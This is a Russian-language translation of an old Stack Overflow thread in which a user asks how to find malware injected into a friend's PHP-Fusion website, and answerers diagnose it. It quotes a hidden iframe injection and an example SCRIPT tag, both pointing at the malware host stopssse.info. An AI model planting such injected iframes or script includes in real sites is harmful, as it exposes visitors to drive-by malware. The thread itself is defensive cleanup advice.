Как я могу проверить, заражен ли сайт вредоносным ПО?

Question

Как я могу проверить, заражен ли сайт вредоносным ПО?

У некоторых моих друзей есть веб-сайт (www.kennelsoffie.dk), и я пытаюсь помочь им, когда возникнут проблемы. Однако на этот раз я не могу понять это. Когда я захожу на сайт с помощью Google Chrome, у меня появляется страница с предупреждением о том, что страница, которую я пытаюсь посетить, содержит элементы из stopssse.info.

Я не знаю PHP, поэтому я просто скачал весь сайт, включая резервные копии базы данных (которые являются файлами.sql). Затем я просмотрел все файлы на предмет stopssse, но ничего не нашел.

Я также протестировал сайт с siteadvisor.com, где написано: "Мы протестировали этот сайт и не обнаружили каких-либо существенных проблем".

Может ли PHP скрыть ссылку на вредоносный сайт, чтобы я не смог найти ее с помощью простого поиска? Если так, как вы можете найти это?

5

php security malware chrome

Источник

CruelIO 01 сен '09 в 11:56

8 ответов

Другие вопросы по тегам php security malware chrome

01 сен '09 в 16:32 2009-09-01 16:32 · Answer 1 · 2009-09-01 16:32

Я нашел это в сгенерированном источнике

<iframe height="0" width="0" src="http://stopssse.info/l.php?thx" style="display: none; visibility: hidden;">

Он был прямо под тегом body, его нет в исходном коде страницы, он добавлен скрытым javascript

редактировать: если вы посмотрите внизу http://www.kennelsoffie.dk/includes/jscript.js вы увидите действительно странно выглядящую функцию javascript. Это запутанная функция javascript, о которой я вам говорил. Начинается с

function lIIlOlIllI1000llII10l0OIIIlIOlIOI1O010l0(O00I10I0l00I0IOIO1Ol10O0Ol1Il1lI10OI00Il){var

Лучше всего найти и удалить его.

e-satis 01 сен '09 в 12:05 2009-09-01 12:05 · Answer 2 · 2009-09-01 12:05

Скорее всего, вы имеете дело с атаками XSS.

В этом случае два шага:

Сканируйте БД, ищите теги "scripts" и избавьтесь от них.
Наймите парня, который знает PHP, чтобы исправить дыры в ваших данных и установить эффективную политику очистки.

2

Источник

e-satis 01 сен '09 в 12:05

Vex 01 сен '09 в 15:40 2009-09-01 15:40 · Answer 3 · 2009-09-01 15:40

Версия PHP-Fusion, которая работает на сайте, кажется v6.01.3, которая выглядит довольно старой, так что, вероятно, было бы неплохо обновить ее.

Похоже, было довольно много рекомендаций по безопасности для PHP-Fusion, включая ряд проблем с SQL-инъекциями.

Полный список рекомендаций для PHP-Fusion здесь: http://secunia.com/advisories/product/5291/?task=advisories

Michael Borgwardt 01 сен '09 в 16:26 2009-09-01 16:26 · Answer 4 · 2009-09-01 16:26

Если сайт был "заражен" с помощью межсайтовых сценариев, то у вас, вероятно, есть комментарий пользователя, который содержит что-то вроде этого:

<SCRIPT SRC="http://stopssse.info/malware.js"></SCRIPT>

Но обратите внимание, что есть много вариантов, которые пытаются скрыть тот факт, что внешний скрипт выполняется, и которые также могут изменить исходный URL, что приведет к сбою при поиске простой строки.

Thomas Owens 01 сен '09 в 12:04 2009-09-01 12:04 · Answer 5 · 2009-09-01 12:04

Вредоносное ПО может отсутствовать на сайте, но оно может исходить из материалов, полученных из внешних источников, таких как рекламные объявления.

1

Источник

Thomas Owens 01 сен '09 в 12:04

Tom Newton 03 сен '09 в 08:07 2009-09-03 08:07 · Answer 6 · 2009-09-03 08:07

В общем случае, ища запутанный javascrot, этот инструмент часто бывает полезен: Wepawet

0

Источник

Tom Newton 03 сен '09 в 08:07

Alix Axel 01 сен '09 в 12:03 2009-09-01 12:03 · Answer 7 · 2009-09-01 12:03

Это там, проверьте файлы PHP (поиск по stopssse).

0

Источник

Alix Axel 01 сен '09 в 12:03

Sampson 01 сен '09 в 12:02 2009-09-01 12:02 · Answer 8 · 2009-09-01 12:02

Ищите любые специфические файлы в реальных каталогах. Может быть файл, который был загружен через незащищенную форму загрузки, которая записывает дополнительные данные в вывод. Скажите своему другу, чтобы он изменил данные своей учетной записи и начал проверять безопасность своего сайта.